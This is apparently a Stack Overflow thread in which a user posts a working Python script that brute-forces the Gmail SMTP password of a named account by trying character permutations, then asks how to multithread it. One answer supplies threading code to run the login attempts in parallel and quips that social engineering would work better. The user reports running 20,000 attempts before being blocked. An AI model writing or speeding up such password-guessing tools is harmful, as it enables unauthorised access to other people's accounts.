0

I spent a lot of time making this brute-force hacking program for gmail:

import smtplib
from itertools import permutations
import string
import time
import os
from datetime import datetime
allC=["a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z","0","1","2","3","4","5","6","7","8","9"]
num=1
allP=len(allC)**num
sumt=0
procent=0
while True:
   for i in permutations(allC, num):
      try :
          i="".join(i)
          server = smtplib.SMTP('smtp.gmail.com',587) 
          server.ehlo()
          server.starttls()
          server.ehlo()
          server.login('raslav.milutinovic@gmail.com',i)
          print str(datetime.now())
          print i
          break
          server.close()     
      except Exception,e:
          if 'Errno 11001' in e:
               input()
          pass
    sumt=sumt+1.00001
    procent=sumt/allP*100
    print "Level :",num
    print "Procent :",int(procent)



   num=num+1
   procent=0
   sumt=0
   allP=len(allC)**num

note: Indents might not be correct But it is very slow=5000 tries per hour

How can i use threads to test more then just one et the time? And also i am not going to use this for evil.... Just a simple learning project

AstroCB
  • 12,337
  • 20
  • 57
  • 73
Rasovica
  • 239
  • 1
  • 4
  • 14

2 Answers2

1

This is one of the tasks that Python's threading is good for.

Whenever the network code is blocked, the other threads get to run. There are already posts on SO showing how to use urllib with threads in a similar way.

John La Rooy
  • 295,403
  • 53
  • 369
  • 502
1

Make one generator thread that fills a list with the permutations and multiple other threads that take values from the list and test it:

from time import sleep
from threading import Thread
queue = []
done = False
num_consumers = 10

def generate():
    #the generator - fill queue with values and set a flag when done
    global queue, done
    for val in permutations(allc, num):
        if len(queue) > 100:
            sleep(0.5)
            continue
        queue.append(val)
    done = True

def consume():
    #the consumer - get a value from the queue and try to login
    global queue, done
    while queue or not done:
        if len(queue) == 0:
            sleep(0.05)
            continue
        try_login(queue.pop())

#create a generator and multiple consumer threads with the respective fcts
generator = Thread(target=generate)
consumers = [Thread(target=consume) for _ in range(num_consumers)]
#start the consumers and the generator
[c.start() for c in consumers]
generator.start()

That's not a complete approach - e.g the queue.pop() should probably be wrapped in a try statement as the list can still be empty despite of the check if the thread switches after the if but before the pop, you'd also need to optimize the sleep values and number of consumers etc. But most important of all, it won't get you far in hacking gmail - which should be pretty impossible by brute force because they're deploying captchas, ip bans and other nice things after too many failed attempts. Your best approach for that would be social engineering :)

l4mpi
  • 5,103
  • 3
  • 34
  • 54
  • I was trying for a day(20 000) atempts. They did nothin. – Rasovica Jun 19 '12 at 06:22
  • Ah, I didn't see that you try to login via SMTP... via http you'll get a captcha after the third wrong attempt, that's impossible with SMTP of course. I'd still have guessed you'd be banned well before 20k attempts but maybe that's still not enough to be considered significant.. – l4mpi Jun 19 '12 at 09:16
  • Yes,you where right. They did block me but stil this is fun example off a weak spot. – Rasovica Jun 19 '12 at 12:50